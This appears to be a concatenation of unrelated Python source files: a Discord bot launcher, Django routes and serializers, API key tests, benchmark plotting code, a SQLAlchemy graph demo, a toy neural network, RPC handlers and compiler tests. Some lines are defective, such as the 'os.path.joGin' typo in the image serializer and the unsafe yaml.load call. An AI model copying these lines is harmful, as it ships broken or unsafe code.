exist_ok=True) file_handler = TimedRotatingFileHandler( os.path.join(args.log_dir, log_file_path), when="d", interval=1, backupCount=7, encoding="UTF-8", ) file_handler.setFormatter(log_format) file_handler.setLevel(args.log_level) handlers_.append(file_handler) if args.verbose: stream_handler = logging.StreamHandler(stream=sys.stderr) stream_handler.setFormatter(log_format) stream_handler.setLevel(args.log_level) handlers_.append(stream_handler) logging.basicConfig( handlers=handlers_, level=args.log_level ) def get_parser() -> argparse.ArgumentParser: """Create and return the argparse""" parser = argparse.ArgumentParser( description="Start the kootkounter Discord bot", formatter_class=argparse.ArgumentDefaultsHelpFormatter, ) parser.add_argument("-tf", "--token-file", dest="token_file", required=True, help="Path to file containing the Discord token for " "the bot") parser.add_argument("-d", "--database", dest="database", default="degeneracy.db", help="Path to the SQLITE database to store state") add_log_parser(parser) return parser def main() -> int: """main entry point""" parser = get_parser() args = parser.parse_args() init_logging(args, "koolkounter.log") with open(args.token_file, "r") as f: token = f.read().strip() engine = create_engine('sqlite:///{}'.format(args.database)) kootkounter.bot.BASE.metadata.create_all(engine) kootkounter.bot.DB = sessionmaker(bind=engine)() kootkounter.bot.BOT.run(token) return 0 if __name__ == "__main__": sys.exit(main())
python
import sys from pathlib import Path # Path modifications paths = ["../build/src", "../src/preproc", "../src/util"] for item in paths: addPath = Path(__file__).parent / item sys.path.append(str(addPath.resolve())) #-----------------------------------------------------------------------------# import util_yaml yamlDict = util_yaml.load(sys.argv[1]) yamlDict = util_yaml.process(yamlDict) breakpoint()
python
import os import yaml def root(): mydir = os.path.dirname(os.path.realpath(__file__)) return os.path.dirname(mydir) def tla_result_fixture(zone_number, score=0): return { 'score': score, 'present': True, 'disqualified': False, 'zone': zone_number, } def get_data(data_root, input_name): input_file = os.path.join(root(), data_root, input_name) output_file = os.path.join(root(), data_root, input_name[:-5] + '.out.yaml') if not os.path.exists(output_file): raise ValueError( "Missing output expectation '{1}' for input '{0}'.".format( input_name, output_file, ), ) with open(output_file) as f: expected_output = yaml.load(f) return input_file, expected_output def get_input_files(data_root): files = os.listdir(os.path.join(root(), data_root)) outputs = [f for f in files if f.endswith('.out.yaml')] inputs = [f for f in files if f.endswith('.yaml') and f not in outputs] return inputs
python
from django.urls import include, path, re_path from . import handlers article_urlpatterns = [ path("2020/", handlers.handler_2020, name="articles-2020"), path( "categories/", include( [ path("<str:category>", handlers.category, name="categories"), path( "<str:category>/newest/", handlers.newest, name="newest-in-category" ), ] ), ), path("<int:year>/", handlers.year_handler, name="articles-year"), path("<int:year>/<int:month>/", handlers.month_handler, name="articles-year-month"), path("<int:year>/popular/", handlers.month_handler, name="articles-year-month"), path( "<int:year>/<int:month>/<int:day>/", handlers.popular_articles, name="popular-articles", ), ] user_urlpatterns = [path("extra/", handlers.home_handler, name="users-extra")] urlpatterns = [ path("", handlers.home_handler, name="home"), path( "articles/", include(article_urlpatterns), ), path("users/", include(user_urlpatterns)), re_path("^[a-z]*$", handlers.catchall, name="catchall"), path("int/<int:id>", handlers.home_handler, name="int"), ]
python
import base64 import os from io import BytesIO from PIL import Image from rest_framework import serializers from photologue.models import Photo, Gallery from oms_cms.config import settings from django.conf import settings BASE_DIR = settings.BASE_DIR class ImageSerializerField(serializers.Field): def to_representation(self, value): outputPath = self.to_internal_value(value) return outputPath def to_internal_value(self, value): f = value.split("/").pop().split(".").pop(1) if f == "jpeg" or f == "jpg" or f == "webp": way = "tmp/img{}.j2p".format(value.split("/").pop().split(".").pop(0)) outputPath = os.path.joGin(settings.MEDIA_ROOT, way) # quality = 50 try: Image.open(settings.MEDIA_ROOT + "/" + way) except: im = Image.open(BASE_DIR + value[value.rfind('/media'):]) im.save(outputPath, 'JPEG', optimize=True, quality=60) path = settings.MEDIA_URL[:settings.MEDIA_URL.find('media')] + outputPath[outputPath.rfind('media'):] return path else: return value class PhotoSerializer(serializers.ModelSerializer): """Photo""" # image = serializers.ImageField(max_length=None, use_url=True, allow_null=True, required=False) # image = serializers.ImageField('image.url') # image = serializers.SerializerMethodField('get_thumbnail_url') image = serializers.URLField(read_only=True, source='image.url') image_alt = ImageSerializerField(read_only=True, source='image.url') # def get_thumbnail_url(self, obj): # return '%s%s' % (settings.MEDIA_URL, obj.get_absolute_url) class Meta: model = Photo fields = ("id", "image", "image_alt") class GallerySerializer(serializers.ModelSerializer): """Photo""" photos = PhotoSerializer(many=True, read_only=True) class Meta: model = Gallery fields = ("id", "title", "description", "photos", 'slug')
python
# vim: set expandtab shiftwidth=4 : # pylint: disable=missing-docstring import json import requests from . import base from . import settings class KeysSymmTest(base.BaseTest): user = settings.EXISTING_USERS[1] wrong_user = settings.EXISTING_USERS[2] def make_put_body(self): return { 'loginKey': self.user['loginKey'], 'privateDataKey': self.user['privateDataKey'], } def get_symm_keys(self, auth=None): if auth is None: auth = self.auth_good() return requests.get( self.url_prefix(self.user) + '/keys/symm', headers={'content-type': 'application/json'}, **auth) def put_symm_keys(self, body, auth=None): if auth is None: auth = self.auth_good() return requests.put( self.url_prefix(self.user) + '/keys/symm', headers={'content-type': 'application/json'}, data=json.dumps(body), **auth) def test_get_bad_auth(self): resp = self.get_symm_keys(self.auth_wrong_user()) self.assertEqual(resp.status_code, requests.codes.unauthorized) resp = self.get_symm_keys(self.auth_nonexisting_user()) self.assertEqual(resp.status_code, requests.codes.unauthorized) resp = self.get_symm_keys(self.auth_bad_login_key()) self.assertEqual(resp.status_code, requests.codes.unauthorized) def test_get_success(self): resp = self.get_symm_keys() self.assertEqual(resp.status_code, requests.codes.ok) resp_body = json.loads(resp.text) self.assertFalse(resp_body.has_key('loginKey')) self.assertTrue(resp_body.has_key('privateDataKey')) self.assertEqual(resp_body['privateDataKey'], self.user['privateDataKey']) def test_put_bad_login_key_format(self): # missing loginKey body = self.make_put_body() del body['loginKey'] resp = self.put_symm_keys(body) self.assertEqual(resp.status_code, requests.codes.bad_request) # loginKey too short body = self.make_put_body() body['loginKey'] = body['loginKey'][:-1] resp = self.put_symm_keys(body) self.assertEqual(resp.status_code, requests.codes.bad_request) # loginKey too long body = self.make_put_body() body['loginKey'] += '0' resp = self.put_symm_keys(body) self.assertEqual(resp.status_code, requests.codes.bad_request) # bad char body = self.make_put_body() body['loginKey'] = body['loginKey'][:-1] + 'x' resp = self.put_symm_keys(body) self.assertEqual(resp.status_code, requests.codes.bad_request) # wrong case body = self.make_put_body() body['loginKey'] = body['loginKey'][:-1] + 'A' resp = self.put_symm_keys(body) self.assertEqual(resp.status_code, requests.codes.bad_request) def test_put_bad_private_data_key_format(self): # missing privateDataKey body = self.make_put_body() del body['privateDataKey'] resp = self.put_symm_keys(body) self.assertEqual(resp.status_code, requests.codes.bad_request) # privateDataKey too short body = self.make_put_body() body['privateDataKey'] = "A" * 43 resp = self.put_symm_keys(body) self.assertEqual(resp.status_code, requests.codes.bad_request) # privateDataKey too long body = self.make_put_body() body['privateDataKey'] = "A" * 201 resp = self.put_symm_keys(body) self.assertEqual(resp.status_code, requests.codes.bad_request) # bad char body = self.make_put_body() body['privateDataKey'] = body['privateDataKey'][:-1] + '%' resp = self.put_symm_keys(body) self.assertEqual(resp.status_code, requests.codes.bad_request) def test_put_success(self): original_auth = self.auth_good() original_login_key = self.user['loginKey'] original_private_data_key = self.user['privateDataKey'] # switch to new loginKey self.user['loginKey'] = "fedcba9876543210" * 8 self.user['privateDataKey'] = "asdf" * 20 body = self.make_put_body() resp = self.put_symm_keys(body, original_auth) self.assertEqual(resp.status_code, requests.codes.ok) # check changed privateDataKey self.test_get_success() # switch back to old loginKey new_auth = self.auth_good() self.user['loginKey'] = original_login_key self.user['privateDataKey'] = original_private_data_key body = self.make_put_body() resp = self.put_symm_keys(body, new_auth) self.assertEqual(resp.status_code, requests.codes.ok) # check original privateDataKey self.test_get_success()
python
#! /usr/bin/env python # -*- coding: utf-8 -*- """Generate ERT vs param. figures. The figures will show the performance in terms of ERT on a log scale w.r.t. parameter. On the y-axis, data is represented as a number of function evaluations. Crosses (+) give the median number of function evaluations for the smallest reached target function value (also divided by dimension). Crosses (×) give the average number of overall conducted function evaluations in case the smallest target function value (1e-8) was not reached. """ from __future__ import absolute_import import os import matplotlib.pyplot as plt import numpy as np from . import toolsstats, testbedsettings, genericsettings, toolsdivers from .ppfig import save_figure, getFontSize __all__ = ['beautify', 'plot', 'read_fun_infos', 'main'] avgstyle = dict(color='r', marker='x', markersize=20) medmarker = dict(linestyle='', marker='+', markersize=30, markeredgewidth=5, zorder=-1) colors = ('k', 'b', 'c', 'g', 'y', 'm', 'r', 'k', 'k', 'c', 'r', 'm') # sort of rainbow style styles = [{'color': 'k', 'marker': 'o', 'markeredgecolor': 'k'}, {'color': 'b'}, {'color': 'c', 'marker': 'v', 'markeredgecolor': 'c'}, {'color': 'g'}, {'color': 'y', 'marker': '^', 'markeredgecolor': 'y'}, {'color': 'm'}, {'color': 'r', 'marker': 's', 'markeredgecolor': 'r'}] # sort of rainbow style refcolor = 'wheat' # should correspond with the colors in pprldistr. # Get benchmark short infos, prepended with the function id. def read_fun_infos(): funInfos = {} for id in testbedsettings.current_testbed.short_names: funInfos[int(id)] = str(id) + ' ' + testbedsettings.current_testbed.short_names[id] return funInfos def beautify(): """Customize figure presentation.""" # Input checking # Get axis handle and set scale for each axis axisHandle = plt.gca() axisHandle.set_xscale("log") axisHandle.set_yscale("log") # Grid options axisHandle.grid(True) ymin, ymax = plt.ylim() xmin, xmax = plt.xlim() # quadratic and cubic "grid" #plt.plot((2,200), (1, 1e2), 'k:') #plt.plot((2,200), (1, 1e4), 'k:') #plt.plot((2,200), (1e3, 1e5), 'k:') #plt.plot((2,200), (1e3, 1e7), 'k:') #plt.plot((2,200), (1e6, 1e8), 'k:') #plt.plot((2,200), (1e6, 1e10), 'k:') # axes limits plt.ylim(10**-0.2, ymax) # Set back the previous maximum. # ticks on axes # axisHandle.invert_xaxis() # plt.xlim(1.8, 45) # TODO should become input arg? # dimticklist = (2, 3, 4, 5, 10, 20, 40) # TODO: should become input arg at some point? # dimannlist = (2, 3, '', 5, 10, 20, 40) # TODO: should become input arg at some point? # TODO: All these should depend on one given input (xlim, ylim) # axisHandle.set_xticks(dimticklist) # axisHandle.set_xticklabels([str(n) for n in dimannlist]) tmp = axisHandle.get_yticks() tmp2 = [] for i in tmp: tmp2.append('%d' % round(np.log10(i))) axisHandle.set_yticklabels(tmp2) plt.ylabel('Run Lengths') def plot(dsList, param='dim', targets=(10., 1., 1e-1, 1e-2, 1e-3, 1e-5, 1e-8)): """Generate plot of ERT vs param.""" dictparam = dsList.dictByParam(param) params = sorted(dictparam) # sorted because we draw lines # generate plot from dsList res = [] # collect data rawdata = {} for p in params: assert len(dictparam[p]) == 1 rawdata[p] = dictparam[p][0].detEvals(targets) # expect dictparam[p] to have only one element # plot lines for ERT xpltdata = params for i, t in enumerate(targets): ypltdata = [] for p in params: data = rawdata[p][i] unsucc = np.isnan(data) assert len(dictparam[p]) == 1 data[unsucc] = dictparam[p][0].maxevals # compute ERT ert, srate, succ = toolsstats.sp(data, issuccessful=(unsucc == False)) ypltdata.append(ert) res.extend(plt.plot(xpltdata, ypltdata, markersize=20, zorder=len(targets) - i, **styles[i])) # for the legend plt.plot([], [], markersize=10, label=' %+d' % (np.log10(targets[i])), **styles[i]) # plot median of successful runs for hardest target with a success for p in params: for i, t in enumerate(reversed(targets)): # targets has to be from hardest to easiest data = rawdata[p][i] data = data[np.isnan(data) == False] if len(data) > 0: median = toolsstats.prctile(data, 50.)[0] res.extend(plt.plot(p, median, styles[i]['color'], **medmarker)) break # plot average number of function evaluations for the hardest target xpltdata = [] ypltdata = [] for p in params: data = rawdata[p][0] # first target xpltdata.append(p) if (np.isnan(data) == False).all(): tmpdata = data.copy() assert len(dictparam[p]) == 1 tmpdata[np.isnan(data)] = dictparam[p][0].maxevals[np.isnan(data)] tmp = np.mean(tmpdata) else: tmp = np.nan # Check what happens when plotting NaN ypltdata.append(tmp) res.extend(plt.plot(xpltdata, ypltdata, **avgstyle)) # display numbers of successes for hardest target where there is still one success for p in params: for i, t in enumerate(targets): # targets has to be from hardest to easiest data = rawdata[p][i] unsucc = np.isnan(data) assert len(dictparam[p]) == 1 data[unsucc] = dictparam[p][0].maxevals # compute ERT ert, srate, succ = toolsstats.sp(data, issuccessful=(unsucc == False)) if srate == 1.: break elif succ > 0: res.append(plt.text(p, ert * 1.85, "%d" % succ, axes=plt.gca(), horizontalalignment="center", verticalalignment="bottom")) break return res def main(dsList, _targets=(10., 1., 1e-1, 1e-2, 1e-3, 1e-5, 1e-8), param=('dim', 'Dimension'), is_normalized=True, outputdir='.'): """Generates figure of ERT vs. param. This script will generate as many figures as there are functions. For a given function and a given parameter value there should be only **one** data set. Crosses (+) give the median number of function evaluations of successful trials for the smallest reached target function value. Crosses (x) give the average number of overall conducted function evaluations in case the smallest target function value (1e-8) was not reached. :keyword DataSetList dsList: data sets :keyword seq _targets: target precisions :keyword tuple param: parameter on x-axis. The first element has to be a string corresponding to the name of an attribute common to elements of dsList. The second element has to be a string which will be used as label for the figures. The values of attribute param have to be sortable. :keyword bool is_normalized: if True the y values are normalized by x values :keyword string outputdir: name of output directory for the image files """ funInfos = read_fun_infos() # TODO check input parameter param for func, dictfunc in dsList.dictByFunc().items(): filename = os.path.join(outputdir,'ppfigparam_%s_f%03d' % (param[0], func)) try: targets = list(j[func] for j in _targets) except TypeError: targets = _targets targets = sorted(targets) # from hard to easy handles = plot(dictfunc, param[0], targets) # # display best algorithm # if not bestalg.bestAlgorithmEntries: # bestalg.load_reference_algorithm() # bestalgdata = [] # for d in dimsBBOB: # entry = bestalg.bestAlgorithmEntries[(d, func)] # tmp = entry.detERT([1e-8])[0] # if not np.isinf(tmp): # bestalgdata.append(tmp/d) # else: # bestalgdata.append(None) # plt.plot(dimsBBOB, bestalgdata, color=refcolor, linewidth=10, zorder=-2) # plt.plot(dimsBBOB, bestalgdata, ls='', marker='d', markersize=25, # color=refcolor, markeredgecolor=refcolor, zorder=-2) a = plt.gca() if is_normalized: for i in handles: try: plt.setp(i, 'ydata', plt.getp(i, 'ydata') / plt.getp(i, 'xdata')) except TypeError: pass a.relim() a.autoscale_view() beautify() plt.xlabel(param[1]) if is_normalized: plt.setp(plt.gca(), 'ylabel', plt.getp(a, 'ylabel') + ' / ' + param[1]) if func in testbedsettings.current_testbed.functions_with_legend: toolsdivers.legend(loc="best") fontSize = getFontSize(funInfos.values()) if func in funInfos.keys(): a.set_title(funInfos[func], fontsize=fontSize) save_figure(filename, dsList[0].algId) plt.close()
python
# Generated by Django 2.1.5 on 2019-02-18 12:48 from django.db import migrations, models def change_negative_fields(apps, schema_editor): Resource = apps.get_model('resources', 'Resource') for resource in Resource.objects.all(): resource_has_changed = False if resource.area and resource.area < 0: resource.area = 0 resource_has_changed = True if resource.max_reservations_per_user and resource.max_reservations_per_user < 0: resource.max_reservations_per_user = 0 resource_has_changed = True if resource.people_capacity and resource.people_capacity < 0: resource.people_capacity = 0 resource_has_changed = True if resource_has_changed: resource.save() class Migration(migrations.Migration): dependencies = [ ('resources', '0074_reservation_confirmed_notification_extra_translations'), ] operations = [ migrations.RunPython(change_negative_fields), migrations.AlterField( model_name='resource', name='area', field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Area (m2)'), ), migrations.AlterField( model_name='resource', name='max_reservations_per_user', field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Maximum number of active reservations per user'), ), migrations.AlterField( model_name='resource', name='people_capacity', field=models.PositiveIntegerField(blank=True, null=True, verbose_name='People capacity'), ), ]
python
""" Samples of how to use tw2.jit Each class exposed in the widgets submodule has an accompanying Demo<class> widget here with some parameters filled out. The demos implemented here are what is displayed in the tw2.devtools WidgetBrowser. """ from tw2.core.resources import JSSymbol from tw2.jit.widgets import SQLARadialGraph import transaction from sqlalchemy import ( Column, Integer, Unicode, MetaData, Table, ForeignKey, ) from sqlalchemy.orm import relation, backref from sqlalchemy.ext.declarative import declarative_base import tw2.sqla as tws session = tws.transactional_session() Base = declarative_base(metadata=MetaData('sqlite:///%s.db' % __name__)) Base.query = session.query_property() friends_mapping = Table( 'persons_friends_mapping', Base.metadata, Column('friender_id', Integer, ForeignKey('persons.id'), primary_key=True), Column('friendee_id', Integer, ForeignKey('persons.id'), primary_key=True)) class Person(Base): __tablename__ = 'persons' id = Column(Integer, primary_key=True) first_name = Column(Unicode(255), nullable=False) last_name = Column(Unicode(255), nullable=False) some_attribute = Column(Unicode(255), nullable=False) def __unicode__(self): return "<img src='%s' /> %s %s" % ( self.gravatar_url(8), self.first_name, self.last_name) @property def email(self): return "%s.%[email protected]" % (self.first_name, self.last_name) def gravatar_url(self, size=64): # import code for encoding urls and generating md5 hashes import urllib try: from hashlib import md5 except ImportError: import md5 md5 = md5.new # construct the url gravatar_url = "http://www.gravatar.com/avatar.php?" gravatar_url += urllib.urlencode({ 'gravatar_id': md5(self.email.lower()).hexdigest(), 'size': size, 'd': 'monsterid', }) return gravatar_url def __jit_data__(self): dictator = "This person is not a dictator." if self.last_name in ["Ben Ali", "Mubarak", "Qaddafi"]: dictator = "Probably needs to be overthrown." return { # This attribute is used to generate hoverover tips "hover_html" : """ <div> <h3>person.__jit_data__()['hover_html']</h3> <img src="%s" /> <p>%s %s with %i friends and %i pets.</p> <p>%s</p> </div> """ % (self.gravatar_url(), self.first_name, self.last_name, len(self.friends), len(self.pets), dictator), # This attribute is ultimately just ignored but by # specifying it here, it is made available clientside # for any custom js you want to rig up. "some_attr" : self.some_attribute, "traversal_costs" : { # You can set this to 2 to change the way depth # accumulates during the generation of a json response. 'friends' : 1 } } class Pet(Base): __tablename__ = 'pets' id = Column(Integer, primary_key=True) name = Column(Unicode(255), nullable=False) variety = Column(Unicode(255), nullable=False) owner_id = Column(Integer, ForeignKey('persons.id')) owner = relation( Person, primaryjoin=owner_id==Person.id, backref=backref('pets')) def __unicode__(self): return "%s the %s" % (self.name, self.variety) def __jit_data__(self): # TODO -- in the future, let's add other attributes # like 'click' or some js callbacks return { "hover_html" : """ <div> <h3>pet.__jit_data__()['hover_html']</h3> <p>This content is specified in the sqlalchemy model. If you didn't know. This is a Pet object. It is a %s that goes by the name %s.</p> <p>You might want to <a href="http://www.google.com/search?q=%s"> google for its name </a>, or something.</p> </div>""" % (self.variety, self.name, self.name), "traversal_costs" : { 'owner' : 2, } } Person.__mapper__.add_property('friends', relation( Person, primaryjoin=Person.id==friends_mapping.c.friendee_id, secondaryjoin=friends_mapping.c.friender_id==Person.id, secondary=friends_mapping, doc="List of this persons' friends!", )) Base.metadata.create_all() def populateDB(sess): if Person.query.count() > 0: print "Not populating DB. Already stuff in there." return import random firsts = ["Sally", "Suzie", "Sandy", "John", "Jim", "Joseph"] lasts = ["Anderson", "Flanderson", "Johnson", "Frompson", "Qaddafi", "Mubarak", "Ben Ali"] for first in firsts: for last in lasts: p = Person( first_name=first, last_name=last, some_attribute="Fun fact #%i" % random.randint(0,255) ) sess.add(p) pet_names = ["Spot", "Mack", "Cracker", "Fluffy", "Alabaster", "Slim Pickins", "Lil' bit", "Balthazaar", "Hadoop"] varieties = ["dog", "cat", "bird", "fish", "hermit crab", "lizard"] for person in Person.query.all(): for i in range(random.randint(0,7)): pet = Pet(name=pet_names[random.randint(0,len(pet_names)-1)], variety=varieties[random.randint(0,len(varieties)-1)]) sess.add(pet) person.pets.append(pet) qaddafis = Person.query.filter_by(last_name='Qaddafi').all() mubaraks = Person.query.filter_by(last_name='Mubarak').all() benalis = Person.query.filter_by(last_name='Ben Ali').all() dictators = qaddafis + mubaraks + benalis print "populating dictators friends" for p1 in dictators: for p2 in dictators: if p1 == p2 or p1 in p2.friends: continue if random.random() > 0.75: p1.friends.append(p2) p2.friends.append(p1) print "populating everyone else's friends" for p1 in Person.query.all(): for p2 in Person.query.all(): if p1 == p2 or p1 in p2.friends: continue if random.random() > 0.95: p1.friends.append(p2) p2.friends.append(p1) print "done populating DB" populateDB(session) transaction.commit() class DemoSQLARadialGraph(SQLARadialGraph): entities = [Person, Pet] excluded_columns = ['id', 'owner_id'] # Some initial target rootObject = Person.query.first() base_url = '/db_radialgraph_demo/' background = { 'CanvasStyles':{ 'strokeStyle' : '#C73B0B' } } backgroundcolor = '#350608' Node = { 'color' : '#C73B0B', } Edge = { 'color': '#F2C545', 'lineWidth':1.5, } import tw2.core as twc mw = twc.core.request_local()['middleware'] mw.controllers.register(DemoSQLARadialGraph, 'db_radialgraph_demo')
python
import numpy as np from matplotlib import pyplot as plt from neural_network import NeuralNet def generate_data(): N = 100 # number of points per class D = 2 # dimensionality K = 3 # number of classes X = np.zeros((N * K, D)) y = np.zeros(N * K, dtype='uint8') # class labels for j in range(K): ix = range(N * j, N * (j + 1)) r = np.linspace(0.0, 1, N) # radius t = np.linspace(j * 4, (j + 1) * 4, N) + np.random.randn(N) * 0.2 # theta X[ix] = np.c_[r * np.sin(t), r * np.cos(t)] y[ix] = j return X, y def list_to_num(list): """sums the numbers in a list based on indices - useful for switching from categories indicated by lists with entries in {0,1} to change the 1 in the ith entry into the number i""" result = 0 for index, number in enumerate(list): result += index * number return result @np.vectorize def num_to_list_padded(integer, padding): """changes a number to a list with added padding""" result = [0 for _ in range(padding)] small_form = num_to_list(integer) result[0:len(small_form)] = small_form return result @np.vectorize def num_to_list(integer): """changes a number to a list - a quasi inverse of the list_to_num""" result = [0 for _ in range(3)] result[integer] = 1 return result def initialize_new(): """Initializes a new example neural net with one hidden layer.""" result = NeuralNet(2) result.add_relu(100) result.add_relu(3) result.add_softmax() result.add_cross_entropy_loss() return result def visualise(X, y): """plot a data set given X - coordinates and y - labels.""" plt.scatter(X[:, 0], X[:, 1], c=y, s=40, cmap=plt.cm.Spectral) plt.show() def train_ex(net, data, iters, learning_rate, initial_iteration=0): """Takes a neural network and trains it on the data given using gradient descent. Learning rate decay is built in""" for i in range(iters): _learning_rate = learning_rate / (1 + i + initial_iteration) if i % 100 == 99: print(f'iteration: {i}') print(f'learning rate: {_learning_rate}') print(f'loss: {net.loss}') for s in data: net.forward_pass(s[0], s[1]) net.back_prop(s[1], learning_rate=_learning_rate) def visualise_boundary(net, granularity): """visualise all the points in a grid by plotting which class would be predicted""" granularity = granularity x = np.linspace(-1.5, 1.5, granularity) y = np.linspace(-1.5, 1.5, granularity) xv, yv = np.meshgrid(x, y) z = np.zeros((granularity, granularity)) for i in range(granularity): for j in range(granularity): z[i, j] = list_to_num( np.round(net.forward_pass(np.array([[xv[i, j]], [yv[i, j]]]), y.transpose()))) plt.scatter(xv, yv, c=z, s=40, cmap=plt.cm.Spectral) plt.show()
python
def rev(string): reverse_string = '' for c in range(len(string)-1, -1, -1): reverse_string += string[c] return reverse_string
python
from typing import Any, Iterable, Iterator, Mapping, Optional, Tuple, TypedDict, Union from eth_enr import ENRAPI from eth_enr.abc import ENRManagerAPI from eth_enr.typing import ENR_KV from eth_typing import HexStr from eth_utils import ( encode_hex, is_hex, is_integer, is_text, to_bytes, to_dict, to_tuple, ) from ddht.abc import RoutingTableAPI, RPCHandlerAPI, RPCRequest from ddht.rpc import RPCError, RPCHandler from ddht.v5_1.rpc_handlers import extract_params class BucketInfo(TypedDict): idx: int nodes: Tuple[HexStr, ...] replacement_cache: Tuple[HexStr, ...] is_full: bool class TableInfoResponse(TypedDict): center_node_id: HexStr num_buckets: int bucket_size: int buckets: Mapping[int, BucketInfo] class RoutingTableInfoHandler(RPCHandler[None, TableInfoResponse]): def __init__(self, routing_table: RoutingTableAPI) -> None: self._routing_table = routing_table def extract_params(self, request: RPCRequest) -> None: if request.get("params"): raise RPCError(f"Unexpected RPC params: {request['params']}",) return None async def do_call(self, params: None) -> TableInfoResponse: stats = TableInfoResponse( center_node_id=encode_hex(self._routing_table.center_node_id), num_buckets=len(self._routing_table.buckets), bucket_size=self._routing_table.bucket_size, buckets=self._bucket_stats(), ) return stats @to_dict def _bucket_stats(self) -> Iterator[Tuple[int, BucketInfo]]: buckets_and_replacement_caches = zip( self._routing_table.buckets, self._routing_table.replacement_caches, ) for idx, (bucket, replacement_cache) in enumerate( buckets_and_replacement_caches, start=1 ): if bucket: yield ( idx, BucketInfo( idx=idx, nodes=tuple(encode_hex(node_id) for node_id in bucket), replacement_cache=tuple( encode_hex(node_id) for node_id in replacement_cache ), is_full=(len(bucket) >= self._routing_table.bucket_size), ), ) class NodeInfoResponse(TypedDict): node_id: HexStr enr: str class NodeInfoHandler(RPCHandler[None, NodeInfoResponse]): _node_id_hex: HexStr def __init__(self, enr: ENRAPI) -> None: self._enr = enr def extract_params(self, request: RPCRequest) -> None: if request.get("params"): raise RPCError(f"Unexpected RPC params: {request['params']}") return None async def do_call(self, params: None) -> NodeInfoResponse: return NodeInfoResponse( node_id=encode_hex(self._enr.node_id), enr=repr(self._enr), ) @to_tuple def normalize_and_validate_kv_pairs( params: Any, ) -> Iterable[Tuple[bytes, Optional[bytes]]]: if not params: raise RPCError("Missing parameters.") for kv_pair in params: if len(kv_pair) != 2: raise RPCError(f"Invalid kv_pair length: {len(kv_pair)}.") raw_key, raw_value = kv_pair if not is_hex(raw_key): raise RPCError( f"Key: {raw_key} is type: {type(raw_key)}. Keys must be hex-encoded strings." ) key = to_bytes(hexstr=raw_key) value: Union[bytes, None] if not raw_value: value = None elif is_integer(raw_value): value = to_bytes(raw_value) elif is_text(raw_value) and is_hex(raw_value): value = to_bytes(hexstr=raw_value) else: raise RPCError( f"Value: {raw_value} is type: {type(raw_value)}. " "Values must be hex-str, integer, or None." ) yield key, value class UpdateNodeInfoHandler(RPCHandler[Tuple[ENR_KV, ...], NodeInfoResponse]): _node_id_hex: HexStr def __init__(self, enr_manager: ENRManagerAPI) -> None: self._enr_manager = enr_manager def extract_params(self, request: RPCRequest) -> Tuple[ENR_KV, ...]: raw_params = extract_params(request) kv_pairs = normalize_and_validate_kv_pairs(raw_params) return kv_pairs async def do_call(self, params: Tuple[ENR_KV, ...]) -> NodeInfoResponse: self._enr_manager.update(*params) return NodeInfoResponse( node_id=encode_hex(self._enr_manager.enr.node_id), enr=repr(self._enr_manager.enr), ) @to_dict def get_core_rpc_handlers( enr_manager: ENRManagerAPI, routing_table: RoutingTableAPI ) -> Iterator[Tuple[str, RPCHandlerAPI]]: yield ("discv5_routingTableInfo", RoutingTableInfoHandler(routing_table)) yield ("discv5_nodeInfo", NodeInfoHandler(enr_manager.enr)) yield ("discv5_updateNodeInfo", UpdateNodeInfoHandler(enr_manager))
python
# vim:fileencoding=utf-8 # License: BSD Copyright: 2016, Kovid Goyal <kovid at kovidgoyal.net> # globals: ρσ_str def strings(): string_funcs = set(( 'capitalize strip lstrip rstrip islower isupper isspace lower upper swapcase' ' center count endswith startswith find rfind index rindex format join ljust rjust' ' partition rpartition replace split rsplit splitlines zfill' ).split(' ')) if not arguments.length: exclude = {'split', 'replace'} elif arguments[0]: exclude = Array.prototype.slice.call(arguments) else: exclude = None if exclude: string_funcs = string_funcs.difference(set(exclude)) for name in string_funcs: String.prototype[name] = ρσ_str.prototype[name]
python
from collections import OrderedDict import pytest from .. import * from .subroutines import ( findRecursionPoints, spillLocalSlotsDuringRecursion, resolveSubroutines, ) def test_findRecursionPoints_empty(): subroutines = dict() expected = dict() actual = findRecursionPoints(subroutines) assert actual == expected def test_findRecursionPoints_none(): def sub1Impl(): return None def sub2Impl(a1): return None def sub3Impl(a1, a2, a3): return None subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64) subroutine2 = SubroutineDefinition(sub2Impl, TealType.bytes) subroutine3 = SubroutineDefinition(sub3Impl, TealType.none) subroutines = { subroutine1: {subroutine2, subroutine3}, subroutine2: {subroutine3}, subroutine3: set(), } expected = { subroutine1: set(), subroutine2: set(), subroutine3: set(), } actual = findRecursionPoints(subroutines) assert actual == expected def test_findRecursionPoints_direct_recursion(): def sub1Impl(): return None def sub2Impl(a1): return None def sub3Impl(a1, a2, a3): return None subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64) subroutine2 = SubroutineDefinition(sub2Impl, TealType.bytes) subroutine3 = SubroutineDefinition(sub3Impl, TealType.none) subroutines = { subroutine1: {subroutine2, subroutine3}, subroutine2: {subroutine2, subroutine3}, subroutine3: set(), } expected = { subroutine1: set(), subroutine2: {subroutine2}, subroutine3: set(), } actual = findRecursionPoints(subroutines) assert actual == expected def test_findRecursionPoints_mutual_recursion(): def sub1Impl(): return None def sub2Impl(a1): return None def sub3Impl(a1, a2, a3): return None subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64) subroutine2 = SubroutineDefinition(sub2Impl, TealType.bytes) subroutine3 = SubroutineDefinition(sub3Impl, TealType.none) subroutines = { subroutine1: {subroutine2, subroutine3}, subroutine2: {subroutine1, subroutine3}, subroutine3: set(), } expected = { subroutine1: {subroutine2}, subroutine2: {subroutine1}, subroutine3: set(), } actual = findRecursionPoints(subroutines) assert actual == expected def test_findRecursionPoints_direct_and_mutual_recursion(): def sub1Impl(): return None def sub2Impl(a1): return None def sub3Impl(a1, a2, a3): return None subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64) subroutine2 = SubroutineDefinition(sub2Impl, TealType.bytes) subroutine3 = SubroutineDefinition(sub3Impl, TealType.none) subroutines = { subroutine1: {subroutine2, subroutine3}, subroutine2: {subroutine1, subroutine2, subroutine3}, subroutine3: set(), } expected = { subroutine1: {subroutine2}, subroutine2: {subroutine1, subroutine2}, subroutine3: set(), } actual = findRecursionPoints(subroutines) assert actual == expected def test_spillLocalSlotsDuringRecursion_no_subroutines(): for version in (4, 5): l1Label = LabelReference("l1") mainOps = [ TealOp(None, Op.txn, "Fee"), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bz, l1Label), TealOp(None, Op.int, 1), TealOp(None, 